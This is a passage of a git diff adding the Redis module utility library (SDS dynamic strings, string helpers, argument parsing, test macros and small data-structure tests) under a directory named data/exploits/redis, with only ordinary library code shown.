alloc; /* excluding the header and null terminator */ + unsigned char flags; /* 3 lsb of type, 5 unused bits */ + char buf[]; +}; + +#define SDS_TYPE_5 0 +#define SDS_TYPE_8 1 +#define SDS_TYPE_16 2 +#define SDS_TYPE_32 3 +#define SDS_TYPE_64 4 +#define SDS_TYPE_MASK 7 +#define SDS_TYPE_BITS 3 +#define SDS_HDR_VAR(T,s) struct sdshdr##T *sh = (void*)((s)-(sizeof(struct sdshdr##T))); +#define SDS_HDR(T,s) ((struct sdshdr##T *)((s)-(sizeof(struct sdshdr##T)))) +#define SDS_TYPE_5_LEN(f) ((f)>>SDS_TYPE_BITS) + +static inline size_t sdslen(const sds s) { + unsigned char flags = s[-1]; + switch(flags&SDS_TYPE_MASK) { + case SDS_TYPE_5: + return SDS_TYPE_5_LEN(flags); + case SDS_TYPE_8: + return SDS_HDR(8,s)->len; + case SDS_TYPE_16: + return SDS_HDR(16,s)->len; + case SDS_TYPE_32: + return SDS_HDR(32,s)->len; + case SDS_TYPE_64: + return SDS_HDR(64,s)->len; + } + return 0; +} + +static inline size_t sdsavail(const sds s) { + unsigned char flags = s[-1]; + switch(flags&SDS_TYPE_MASK) { + case SDS_TYPE_5: { + return 0; + } + case SDS_TYPE_8: { + SDS_HDR_VAR(8,s); + return sh->alloc - sh->len; + } + case SDS_TYPE_16: { + SDS_HDR_VAR(16,s); + return sh->alloc - sh->len; + } + case SDS_TYPE_32: { + SDS_HDR_VAR(32,s); + return sh->alloc - sh->len; + } + case SDS_TYPE_64: { + SDS_HDR_VAR(64,s); + return sh->alloc - sh->len; + } + } + return 0; +} + +static inline void sdssetlen(sds s, size_t newlen) { + unsigned char flags = s[-1]; + switch(flags&SDS_TYPE_MASK) { + case SDS_TYPE_5: + { + unsigned char *fp = ((unsigned char*)s)-1; + *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS); + } + break; + case SDS_TYPE_8: + SDS_HDR(8,s)->len = newlen; + break; + case SDS_TYPE_16: + SDS_HDR(16,s)->len = newlen; + break; + case SDS_TYPE_32: + SDS_HDR(32,s)->len = newlen; + break; + case SDS_TYPE_64: + SDS_HDR(64,s)->len = newlen; + break; + } +} + +static inline void sdsinclen(sds s, size_t inc) { + unsigned char flags = s[-1]; + switch(flags&SDS_TYPE_MASK) { + case SDS_TYPE_5: + { + unsigned char *fp = ((unsigned char*)s)-1; + unsigned char newlen = SDS_TYPE_5_LEN(flags)+inc; + *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS); + } + break; + case SDS_TYPE_8: + SDS_HDR(8,s)->len += inc; + break; + case SDS_TYPE_16: + SDS_HDR(16,s)->len += inc; + break; + case SDS_TYPE_32: + SDS_HDR(32,s)->len += inc; + break; + case SDS_TYPE_64: + SDS_HDR(64,s)->len += inc; + break; + } +} + +/* sdsalloc() = sdsavail() + sdslen() */ +static inline size_t sdsalloc(const sds s) { + unsigned char flags = s[-1]; + switch(flags&SDS_TYPE_MASK) { + case SDS_TYPE_5: + return SDS_TYPE_5_LEN(flags); + case SDS_TYPE_8: + return SDS_HDR(8,s)->alloc; + case SDS_TYPE_16: + return SDS_HDR(16,s)->alloc; + case SDS_TYPE_32: + return SDS_HDR(32,s)->alloc; + case SDS_TYPE_64: + return SDS_HDR(64,s)->alloc; + } + return 0; +} + +static inline void sdssetalloc(sds s, size_t newlen) { + unsigned char flags = s[-1]; + switch(flags&SDS_TYPE_MASK) { + case SDS_TYPE_5: + /* Nothing to do, this type has no total allocation info. */ + break; + case SDS_TYPE_8: + SDS_HDR(8,s)->alloc = newlen; + break; + case SDS_TYPE_16: + SDS_HDR(16,s)->alloc = newlen; + break; + case SDS_TYPE_32: + SDS_HDR(32,s)->alloc = newlen; + break; + case SDS_TYPE_64: + SDS_HDR(64,s)->alloc = newlen; + break; + } +} + +sds sdsnewlen(const void *init, size_t initlen); +sds sdsnew(const char *init); +sds sdsempty(void); +sds sdsdup(const sds s); +void sdsfree(sds s); +sds sdsgrowzero(sds s, size_t len); +sds sdscatlen(sds s, const void *t, size_t len); +sds sdscat(sds s, const char *t); +sds sdscatsds(sds s, const sds t); +sds sdscpylen(sds s, const char *t, size_t len); +sds sdscpy(sds s, const char *t); + +sds sdscatvprintf(sds s, const char *fmt, va_list ap); +#ifdef __GNUC__ +sds sdscatprintf(sds s, const char *fmt, ...) + __attribute__((format(printf, 2, 3))); +#else +sds sdscatprintf(sds s, const char *fmt, ...); +#endif + +sds sdscatfmt(sds s, char const *fmt, ...); +sds sdstrim(sds s, const char *cset); +void sdsrange(sds s, int start, int end); +void sdsupdatelen(sds s); +void sdsclear(sds s); +int sdscmp(const sds s1, const sds s2); +sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count); +void sdsfreesplitres(sds *tokens, int count); +void sdstolower(sds s); +void sdstoupper(sds s); +sds sdsfromlonglong(long long value); +sds sdscatrepr(sds s, const char *p, size_t len); +sds *sdssplitargs(const char *line, int *argc); +sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen); +sds sdsjoin(char **argv, int argc, char *sep); +sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen); + +/* Low level functions exposed to the user API */ +sds sdsMakeRoomFor(sds s, size_t addlen); +void sdsIncrLen(sds s, int incr); +sds sdsRemoveFreeSpace(sds s); +size_t sdsAllocSize(sds s); +void *sdsAllocPtr(sds s); + +/* Export the allocator used by SDS to the program using SDS. + * Sometimes the program SDS is linked to, may use a different set of + * allocators, but may want to allocate or free things that SDS will + * respectively free or allocate. */ +void *sds_malloc(size_t size); +void *sds_realloc(void *ptr, size_t size); +void sds_free(void *ptr); + +#ifdef REDIS_TEST +int sdsTest(int argc, char *argv[]); +#endif + +#endif diff --git a/data/exploits/redis/rmutil/sdsalloc.h b/data/exploits/redis/rmutil/sdsalloc.h new file mode 100644 index 000000000000..1538fdfeafbe --- /dev/null +++ b/data/exploits/redis/rmutil/sdsalloc.h @@ -0,0 +1,47 @@ +/* SDSLib 2.0 -- A C dynamic strings library + * + * Copyright (c) 2006-2015, Salvatore Sanfilippo + * Copyright (c) 2015, Redis Labs, Inc + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * * Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * * Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * * Neither the name of Redis nor the names of its contributors may be used + * to endorse or promote products derived from this software without + * specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE. + */ + +/* SDS allocator selection. + * + * This file is used in order to change the SDS allocator at compile time. + * Just define the following defines to what you want to use. Also add + * the include of your alternate allocator if needed (not needed in order + * to use the default libc allocator). */ + +#if defined(__MACH__) +#include +#else +#include +#endif +//#include "zmalloc.h" +#define s_malloc malloc +#define s_realloc realloc +#define s_free free diff --git a/data/exploits/redis/rmutil/strings.c b/data/exploits/redis/rmutil/strings.c new file mode 100644 index 000000000000..39330130bcc9 --- /dev/null +++ b/data/exploits/redis/rmutil/strings.c @@ -0,0 +1,81 @@ +#include +#include +#include +#include "strings.h" +#include "alloc.h" + +#include "sds.h" + +// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...) { +// sds s = sdsempty(); + +// va_list ap; +// va_start(ap, fmt); +// s = sdscatvprintf(s, fmt, ap); +// va_end(ap); + +// RedisModuleString *ret = RedisModule_CreateString(ctx, (const char *)s, sdslen(s)); +// sdsfree(s); +// return ret; +// } + +int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2) { + + const char *c1, *c2; + size_t l1, l2; + c1 = RedisModule_StringPtrLen(s1, &l1); + c2 = RedisModule_StringPtrLen(s2, &l2); + if (l1 != l2) return 0; + + return strncmp(c1, c2, l1) == 0; +} + +int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2) { + + const char *c1; + size_t l1, l2 = strlen(s2); + c1 = RedisModule_StringPtrLen(s1, &l1); + if (l1 != l2) return 0; + + return strncmp(c1, s2, l1) == 0; +} +int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2) { + + const char *c1; + size_t l1, l2 = strlen(s2); + c1 = RedisModule_StringPtrLen(s1, &l1); + if (l1 != l2) return 0; + + return strncasecmp(c1, s2, l1) == 0; +} + +void RMUtil_StringToLower(RedisModuleString *s) { + + size_t l; + char *c = (char *)RedisModule_StringPtrLen(s, &l); + size_t i; + for (i = 0; i < l; i++) { + *c = tolower(*c); + ++c; + } +} + +void RMUtil_StringToUpper(RedisModuleString *s) { + size_t l; + char *c = (char *)RedisModule_StringPtrLen(s, &l); + size_t i; + for (i = 0; i < l; i++) { + *c = toupper(*c); + ++c; + } +} + +void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options) { + for (size_t ii = 0; ii < n; ++ii) { + const char *p = RedisModule_StringPtrLen(rs[ii], NULL); + if (options & RMUTIL_STRINGCONVERT_COPY) { + p = strdup(p); + } + ss[ii] = p; + } +} \ No newline at end of file diff --git a/data/exploits/redis/rmutil/strings.h b/data/exploits/redis/rmutil/strings.h new file mode 100644 index 000000000000..eaef71e0b14a --- /dev/null +++ b/data/exploits/redis/rmutil/strings.h @@ -0,0 +1,38 @@ +#ifndef __RMUTIL_STRINGS_H__ +#define __RMUTIL_STRINGS_H__ + +#include + +/* +* Create a new RedisModuleString object from a printf-style format and arguments. +* Note that RedisModuleString objects CANNOT be used as formatting arguments. +*/ +// DEPRECATED since it was added to the RedisModule API. Replaced with a macro below +// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...); +#define RMUtil_CreateFormattedString RedisModule_CreateStringPrintf + +/* Return 1 if the two strings are equal. Case *sensitive* */ +int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2); + +/* Return 1 if the string is equal to a C NULL terminated string. Case *sensitive* */ +int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2); + +/* Return 1 if the string is equal to a C NULL terminated string. Case *insensitive* */ +int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2); + +/* Converts a redis string to lowercase in place without reallocating anything */ +void RMUtil_StringToLower(RedisModuleString *s); + +/* Converts a redis string to uppercase in place without reallocating anything */ +void RMUtil_StringToUpper(RedisModuleString *s); + +// If set, copy the strings using strdup rather than simply storing pointers. +#define RMUTIL_STRINGCONVERT_COPY 1 + +/** + * Convert one or more RedisModuleString objects into `const char*`. + * Both rs and ss are arrays, and should be of length. + * Options may be 0 or `RMUTIL_STRINGCONVERT_COPY` + */ +void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options); +#endif diff --git a/data/exploits/redis/rmutil/test.h b/data/exploits/redis/rmutil/test.h new file mode 100644 index 000000000000..a15864a9e555 --- /dev/null +++ b/data/exploits/redis/rmutil/test.h @@ -0,0 +1,69 @@ +#ifndef __TESTUTIL_H__ +#define __TESTUTIL_H__ + +#include +#include +#include + +static int numTests = 0; +static int numAsserts = 0; + +#define TESTFUNC(f) \ + printf(" Testing %s\t\t", __STRING(f)); \ + numTests++; \ + fflush(stdout); \ + if (f()) { \ + printf(" %s FAILED!\n", __STRING(f)); \ + exit(1); \ + } else \ + printf("[PASS]\n"); + +#define ASSERTM(expr, ...) \ + if (!(expr)) { \ + fprintf(stderr, "%s:%d: Assertion '%s' Failed: " __VA_ARGS__ "\n", __FILE__, __LINE__, \ + __STRING(expr)); \ + return -1; \ + } \ + numAsserts++; + +#define ASSERT(expr) \ + if (!(expr)) { \ + fprintf(stderr, "%s:%d Assertion '%s' Failed\n", __FILE__, __LINE__, __STRING(expr)); \ + return -1; \ + } \ + numAsserts++; + +#define ASSERT_STRING_EQ(s1, s2) ASSERT(!strcmp(s1, s2)); + +#define ASSERT_EQUAL(x, y, ...) \ + if (x != y) { \ + fprintf(stderr, "%s:%d: ", __FILE__, __LINE__); \ + fprintf(stderr, "%g != %g: " __VA_ARGS__ "\n", (double)x, (double)y); \ + return -1; \ + } \ + numAsserts++; + +#define FAIL(fmt, ...) \ + { \ + fprintf(stderr, "%s:%d: FAIL: " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__); \ + return -1; \ + } + +#define RETURN_TEST_SUCCESS return 0; +#define TEST_CASE(x, block) \ + int x { \ + block; \ + return 0 \ + } + +#define PRINT_TEST_SUMMARY printf("\nTotal: %d tests and %d assertions OK\n", numTests, numAsserts); + +#define TEST_MAIN(body) \ + int main(int argc, char **argv) { \ + printf("Starting Test '%s'...\n", argv[0]); \ + body; \ + PRINT_TEST_SUMMARY; \ + printf("\n--------------------\n\n"); \ + return 0; \ + } +#endif \ No newline at end of file diff --git a/data/exploits/redis/rmutil/test_heap.c b/data/exploits/redis/rmutil/test_heap.c new file mode 100644 index 000000000000..820c2994398c --- /dev/null +++ b/data/exploits/redis/rmutil/test_heap.c @@ -0,0 +1,38 @@ +#include +#include "heap.h" +#include "assert.h" + +int cmp(void *a, void *b) { + int *__a = (int *) a; + int *__b = (int *) b; + return *__a - *__b; +} + +int main(int argc, char **argv) { + int myints[] = {10, 20, 30, 5, 15}; + Vector *v = NewVector(int, 5); + for (int i = 0; i < 5; i++) { + Vector_Push(v, myints[i]); + } + + Make_Heap(v, 0, v->top, cmp); + + int n; + Vector_Get(v, 0, &n); + assert(30 == n); + + Heap_Pop(v, 0, v->top, cmp); + v->top = 4; + Vector_Get(v, 0, &n); + assert(20 == n); + + Vector_Push(v, 99); + Heap_Push(v, 0, v->top, cmp); + Vector_Get(v, 0, &n); + assert(99 == n); + + Vector_Free(v); + printf("PASS!\n"); + return 0; +} + diff --git a/data/exploits/redis/rmutil/test_periodic.c b/data/exploits/redis/rmutil/test_periodic.c new file mode 100644 index 000000000000..a27d7a49140e --- /dev/null +++ b/data/exploits/redis/rmutil/test_periodic.c @@ -0,0 +1,26 @@ +#include +#include +#include +#include "periodic.h" +#include "assert.h" +#include "test.h" + +void timerCb(RedisModuleCtx *ctx, void *p) { + int *x = p; + (*x)++; +} + +int testPeriodic() { + int x = 0; + struct RMUtilTimer *tm = RMUtil_NewPeriodicTimer( + timerCb, NULL, &x, (struct timespec){.tv_sec = 0, .tv_nsec = 10000000}); + + sleep(1); + + ASSERT_EQUAL(0, RMUtilTimer_Terminate(tm)); + ASSERT(x > 0); + ASSERT(x <= 100); + return 0; +} + +TEST_MAIN({ TESTFUNC(testPeriodic); }); diff --git a/data/exploits/redis/rmutil/test_priority_queue.c b/data/exploits/redis/rmutil/test_priority_queue.c new file mode 100644 index 000000000000..4a21c18a8c77 --- /dev/null +++ b/data/exploits/redis/rmutil/test_priority_queue.c @@ -0,0 +1,37 @@ +#include +#include "assert.h" +#include "priority_queue.h" + +int cmp(void* i1, void* i2) { + int *__i1 = (int*) i1; + int *__i2 = (int*) i2; + return *__i1 - *__i2; +} + +int main(int argc, char **argv) { + PriorityQueue *pq = NewPriorityQueue(int, 10, cmp); + assert(0 == Priority_Queue_Size(pq)); + + for (int i = 0; i < 5; i++) { + Priority_Queue_Push(pq, i); + } + assert(5 == Priority_Queue_Size(pq)); + + Priority_Queue_Pop(pq); + assert(4 == Priority_Queue_Size(pq)); + + Priority_Queue_Push(pq, 10); + Priority_Queue_Push(pq, 20); + Priority_Queue_Push(pq, 15); + int n; + Priority_Queue_Top(pq, &n); + assert(20 == n); + + Priority_Queue_Pop(pq); + Priority_Queue_Top(pq, &n); + assert(15 == n); + + Priority_Queue_Free(pq); + printf("PASS!\n"); + return 0; +} diff --git a/data/exploits/redis/rmutil/test_util.h b/data/exploits/redis/rmutil/test_util.h new file mode 100644 index 000000000000..5a6273d5b59d --- /dev/null +++ b/data/exploits/redis/rmutil/test_util.h @@ -0,0 +1,67 @@ +#ifndef __TEST_UTIL_H__ +#define __TEST_UTIL_H__ + +#include "util.h" +#include +#include +#include + + +#define RMUtil_Test(f) \ + if (argc < 2 || RMUtil_ArgExists(__STRING(f), argv, argc, 1)) { \ + int rc = f(ctx); \ + if (rc != REDISMODULE_OK) { \ + RedisModule_ReplyWithError(ctx, "Test " __STRING(f) " FAILED"); \ + return REDISMODULE_ERR;\ + }\ + } + + +#define RMUtil_Assert(expr) if (!(expr)) { fprintf (stderr, "Assertion '%s' Failed\n", __STRING(expr)); return REDISMODULE_ERR; } + +#define RMUtil_AssertReplyEquals(rep, cstr) RMUtil_Assert( \ + RMUtil_StringEquals(RedisModule_CreateStringFromCallReply(rep), RedisModule_CreateString(ctx, cstr, strlen(cstr))) \ + ) +# + +/** +* Create an arg list to pass to a redis command handler manually, based on the format in fmt. +* The accepted format specifiers are: +* c - for null terminated c strings +* s - for RedisModuleString* objects +* l - for longs +* +* Example: RMUtil_MakeArgs(ctx, &argc, "clc", "hello", 1337, "world"); +* +* Returns an array of RedisModuleString pointers. The size of the array is store in argcp +*/ +RedisModuleString **RMUtil_MakeArgs(RedisModuleCtx *ctx, int *argcp, const char *fmt, ...) { + + va_list ap; + va_start(ap, fmt); + RedisModuleString **argv = calloc(strlen(fmt), sizeof(RedisModuleString*)); + int argc = 0; + const char *p = fmt; + while(*p) { + if (*p == 'c') { + char *cstr = va_arg(ap,char*); + argv[argc++] = RedisModule_CreateString(ctx, cstr, strlen(cstr)); + } else if (*p == 's') { + argv[argc++] = va_arg(ap,void*);; + } else if (*p == 'l') { + long ll = va_arg(ap,long long); + argv[argc++] = RedisModule_CreateStringFromLongLong(ctx, ll); + } else { + goto fmterr; + } + p++; + } + *argcp = argc; + + return argv; +fmterr: + free(argv); + return NULL; +} + +#endif \ No newline at end of file diff --git a/data/exploits/redis/rmutil/test_vector.c b/data/exploits/redis/rmutil/test_vector.c new file mode 100644 index 000000000000..c5737b269d52 --- /dev/null +++ b/data/exploits/redis/rmutil/test_vector.c @@ -0,0 +1,58 @@ +#include "vector.h" +#include +#include "test.h" + +int testVector() { + + Vector *v = NewVector(int, 1); + ASSERT(v != NULL); + // Vector_Put(v, 0, 1); + // Vector_Put(v, 1, 3); + for (int i = 0; i < 10; i++) { + Vector_Push(v, i); + } + ASSERT_EQUAL(10, Vector_Size(v)); + ASSERT_EQUAL(16, Vector_Cap(v)); + + for (int i = 0; i < Vector_Size(v); i++) { + int n; + int rc = Vector_Get(v, i, &n); + ASSERT_EQUAL(1, rc); + // printf("%d %d\n", rc, n); + + ASSERT_EQUAL(n, i); + } + + Vector_Free(v); + + v = NewVector(char *, 0); + int N = 4; + char *strings[4] = {"hello", "world", "foo", "bar"}; + + for (int i = 0; i < N; i++) { + Vector_Push(v, strings[i]); + } + ASSERT_EQUAL(N, Vector_Size(v)); + ASSERT(Vector_Cap(v) >= N); + + for (int i = 0; i < Vector_Size(v); i++) { + char *x; + int rc = Vector_Get(v, i, &x); + ASSERT_EQUAL(1, rc); + ASSERT_STRING_EQ(x, strings[i]); + } + + int rc = Vector_Get(v, 100, NULL); + ASSERT_EQUAL(0, rc); + + Vector_Free(v); + + return 0; + // Vector_Push(v, "hello"); + // Vector_Push(v, "world"); + // char *x = NULL; + // int rc = Vector_Getx(v, 0, &x); + // printf("rc: %d got %s\n", rc, x); +} + +TEST_MAIN({ TESTFUNC(testVector); }); diff --git a/data/exploits/redis/rmutil/util.c b/data/exploits/redis/rmutil/util.c new file mode 100644 index 000000000000..886c8b58e09f --- /dev/null +++ b/data/exploits/redis/rmutil/util.c @@ -0,0 +1,299 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#define REDISMODULE_EXPERIMENTAL_API +#include +#include "util.h" + +/** +Check if an argument exists in an argument list (argv,argc), starting at offset. +@return 0 if it doesn't exist, otherwise the offset it exists in +*/ +int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset) { + + size_t larg = strlen(arg); + for (; offset < argc; offset++) { + size_t l; + const char *carg = RedisModule_StringPtrLen(argv[offset], &l); + if (l != larg) continue; + if (carg != NULL && strncasecmp(carg, arg, larg) == 0) { + return offset; + } + } + return 0; +} + +/** +Check if an argument exists in an argument list (argv,argc) +@return -1 if it doesn't exist, otherwise the offset it exists in +*/ +int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc) { + + size_t larg = strlen(arg); + for (int offset = 0; offset < argc; offset++) { + size_t l; + const char *carg = RedisModule_StringPtrLen(argv[offset], &l); + if (l != larg) continue; + if (carg != NULL && strncasecmp(carg, arg, larg) == 0) { + return offset; + } + } + return -1; +} + +RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx) { + + RedisModuleCallReply *r = RedisModule_Call(ctx, "INFO", "c", "all"); + if (r == NULL || RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) { + return NULL; + } + + int cap = 100; // rough estimate of info lines + RMUtilInfo *info = malloc(sizeof(RMUtilInfo)); + info->entries = calloc(cap, sizeof(RMUtilInfoEntry)); + + int i = 0; + size_t sz; + char *text = (char *)RedisModule_CallReplyStringPtr(r, &sz); + + char *line = text; + while (line && line < text + sz) { + char *line = strsep(&text, "\r\n"); + if (line == NULL) break; + + if (!(*line >= 'a' && *line <= 'z')) { // skip non entry lines + continue; + } + + char *key = strsep(&line, ":"); + info->entries[i].key = strdup(key); + info->entries[i].val = strdup(line); + i++; + if (i >= cap) { + cap *= 2; + info->entries = realloc(info->entries, cap * sizeof(RMUtilInfoEntry)); + } + } + info->numEntries = i; + RedisModule_FreeCallReply(r); + return info; +} +void RMUtilRedisInfo_Free(RMUtilInfo *info) { + for (int i = 0; i < info->numEntries; i++) { + free(info->entries[i].key); + free(info->entries[i].val); + } + free(info->entries); + free(info); +} + +int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val) { + + const char *p = NULL; + if (!RMUtilInfo_GetString(info, key, &p)) { + return 0; + } + + *val = strtoll(p, NULL, 10); + if ((errno == ERANGE && (*val == LONG_MAX || *val == LONG_MIN)) || (errno != 0 && *val == 0)) { + *val = -1; + return 0; + } + + return 1; +} + +int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str) { + int i; + for (i = 0; i < info->numEntries; i++) { + if (!strcmp(key, info->entries[i].key)) { + *str = info->entries[i].val; + return 1; + } + } + return 0; +} + +int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d) { + const char *p = NULL; + if (!RMUtilInfo_GetString(info, key, &p)) { + printf("not found %s\n", key); + return 0; + } + + *d = strtod(p, NULL); + if ((errno == ERANGE && (*d == HUGE_VAL || *d == -HUGE_VAL)) || (errno != 0 && *d == 0)) { + return 0; + } + + return 1; +} + +/* +c -- pointer to a Null terminated C string pointer. +b -- pointer to a C buffer, followed by pointer to a size_t for its length +s -- pointer to a RedisModuleString +l -- pointer to Long long integer. +d -- pointer to a Double +* -- do not parse this argument at all +*/ +int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...) { + va_list ap; + va_start(ap, fmt); + int rc = rmutil_vparseArgs(argv, argc, offset, fmt, ap); + va_end(ap); + return rc; +} + +// Internal function that parses arguments based on the format described above +int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap) { + + int i = offset; + char *c = (char *)fmt; + while (*c && i < argc) { + + // read c string + if (*c == 'c') { + char **p = va_arg(ap, char **); + *p = (char *)RedisModule_StringPtrLen(argv[i], NULL); + } else if (*c == 'b') { + char **p = va_arg(ap, char **); + size_t *len = va_arg(ap, size_t *); + *p = (char *)RedisModule_StringPtrLen(argv[i], len); + } else if (*c == 's') { // read redis string + + RedisModuleString **s = va_arg(ap, void *); + *s = argv[i]; + + } else if (*c == 'l') { // read long + long long *l = va_arg(ap, long long *); + + if (RedisModule_StringToLongLong(argv[i], l) != REDISMODULE_OK) { + return REDISMODULE_ERR; + } + } else if (*c == 'd') { // read double + double *d = va_arg(ap, double *); + if (RedisModule_StringToDouble(argv[i], d) != REDISMODULE_OK) { + return REDISMODULE_ERR; + } + } else if (*c == '*') { // skip current arg + // do nothing + } else { + return REDISMODULE_ERR; // WAT? + } + c++; + i++; + } + // if the format is longer than argc, retun an error + if (*c != 0) { + return REDISMODULE_ERR; + } + return REDISMODULE_OK; +} + +int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt, + ...) { + + int pos = RMUtil_ArgIndex(token, argv, argc); + if (pos < 0) { + return REDISMODULE_ERR; + } + + va_list ap; + va_start(ap, fmt); + int rc = rmutil_vparseArgs(argv, argc, pos + 1, fmt, ap); + va_end(ap); + return rc; +} + +RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep, + const char *path) { + if (rep == NULL) return NULL; + + RedisModuleCallReply *ele = rep; + const char *s = path; + char *e; + long idx; + do { + errno = 0; + idx = strtol(s, &e, 10); + + if ((errno == ERANGE && (idx == LONG_MAX || idx == LONG_MIN)) || (errno != 0 && idx == 0) || + (REDISMODULE_REPLY_ARRAY != RedisModule_CallReplyType(ele)) || (s == e)) { + ele = NULL; + break; + } + s = e; + ele = RedisModule_CallReplyArrayElement(ele, idx - 1); + + } while ((ele != NULL) && (*e != '\0')); + + return ele; +} + +int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out) { + if (key == NULL) { + return RMUTIL_VALUE_MISSING; + } + int keytype = RedisModule_KeyType(key); + if (keytype == REDISMODULE_KEYTYPE_EMPTY) { + return RMUTIL_VALUE_EMPTY; + } else if (keytype == REDISMODULE_KEYTYPE_MODULE && RedisModule_ModuleTypeGetType(key) == type) { + *out = RedisModule_ModuleTypeGetValue(key); + return RMUTIL_VALUE_OK; + } else { + return RMUTIL_VALUE_MISMATCH; + } +} + +RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset, + const char *keyword, size_t *nargs) { + if (offset > argc) { + return NULL; + } + + argv += offset; + argc -= offset; + + int ix = RMUtil_ArgIndex(keyword, argv, argc); + if (ix < 0) { + return NULL; + } else if (ix >= argc - 1) { + *nargs = RMUTIL_VARARGS_BADARG; + return argv; + } + + argv += (ix + 1); + argc -= (ix + 1); + + long long n = 0; + RMUtil_ParseArgs(argv, argc, 0, "l", &n); + if (n > argc - 1 || n < 0) { + *nargs = RMUTIL_VARARGS_BADARG; + return argv; + } + + *nargs = n; + return argv + 1; +} + +void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value) { + RedisModuleCtx *ctx = RedisModule_GetThreadSafeContext(NULL); + RedisModuleCallReply *rep = RedisModule_Call(ctx, "DUMP", "s", key); + if (rep != NULL && RedisModule_CallReplyType(rep) == REDISMODULE_REPLY_STRING) { + size_t n; + const char *s = RedisModule_CallReplyStringPtr(rep, &n); + RedisModule_EmitAOF(aof, "RESTORE", "slb", key, 0, s, n); + } else { + RedisModule_Log(RedisModule_GetContextFromIO(aof), "warning", "Failed to emit AOF"); + } + if (rep != NULL) { + RedisModule_FreeCallReply(rep); + } + RedisModule_FreeThreadSafeContext(ctx); +} \ No newline at end of file diff --git a/data/exploits/redis/rmutil/util.h b/data/exploits/redis/rmutil/util.h new file mode 100644 index 000000000000..cc75de686650 --- /dev/null +++ b/data/exploits/redis/rmutil/util.h @@ -0,0 +1,149 @@ +#ifndef __UTIL_H__ +#define __UTIL_H__ + +#include +#include + +/// make sure the response is not NULL or an error, and if it is sends the error to the client and +/// exit the current function +#define RMUTIL_ASSERT_NOERROR(ctx, r) \ + if (r == NULL) { \ + return RedisModule_ReplyWithError(ctx, "ERR reply is NULL"); \ + } else if (RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) { \ + RedisModule_ReplyWithCallReply(ctx, r); \ + return REDISMODULE_ERR; \ + } + +#define __rmutil_register_cmd(ctx, cmd, f, mode) \ + if (RedisModule_CreateCommand(ctx, cmd, f, mode, 1, 1, 1) == REDISMODULE_ERR) \ + return REDISMODULE_ERR; + +#define RMUtil_RegisterReadCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "readonly") + +#define RMUtil_RegisterWriteCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "write") + +/* RedisModule utilities. */ + +/** DEPRECATED: Return the offset of an arg if it exists in the arg list, or 0 if it's not there */ +int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset); + +/* Same as argExists but returns -1 if not found. Use this, RMUtil_ArgExists is kept for backwards +compatibility. */ +int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc); + +/** +Automatically conver the arg list to corresponding variable pointers according to a given format. +You pass it the command arg list and count, the starting offset, a parsing format, and pointers to +the variables. +The format is a string consisting of the following identifiers: + + c -- pointer to a Null terminated C string pointer. + s -- pointer to a RedisModuleString + l -- pointer to Long long integer. + d -- pointer to a Double + * -- do not parse this argument at all + +Example: If I want to parse args[1], args[2] as a long long and 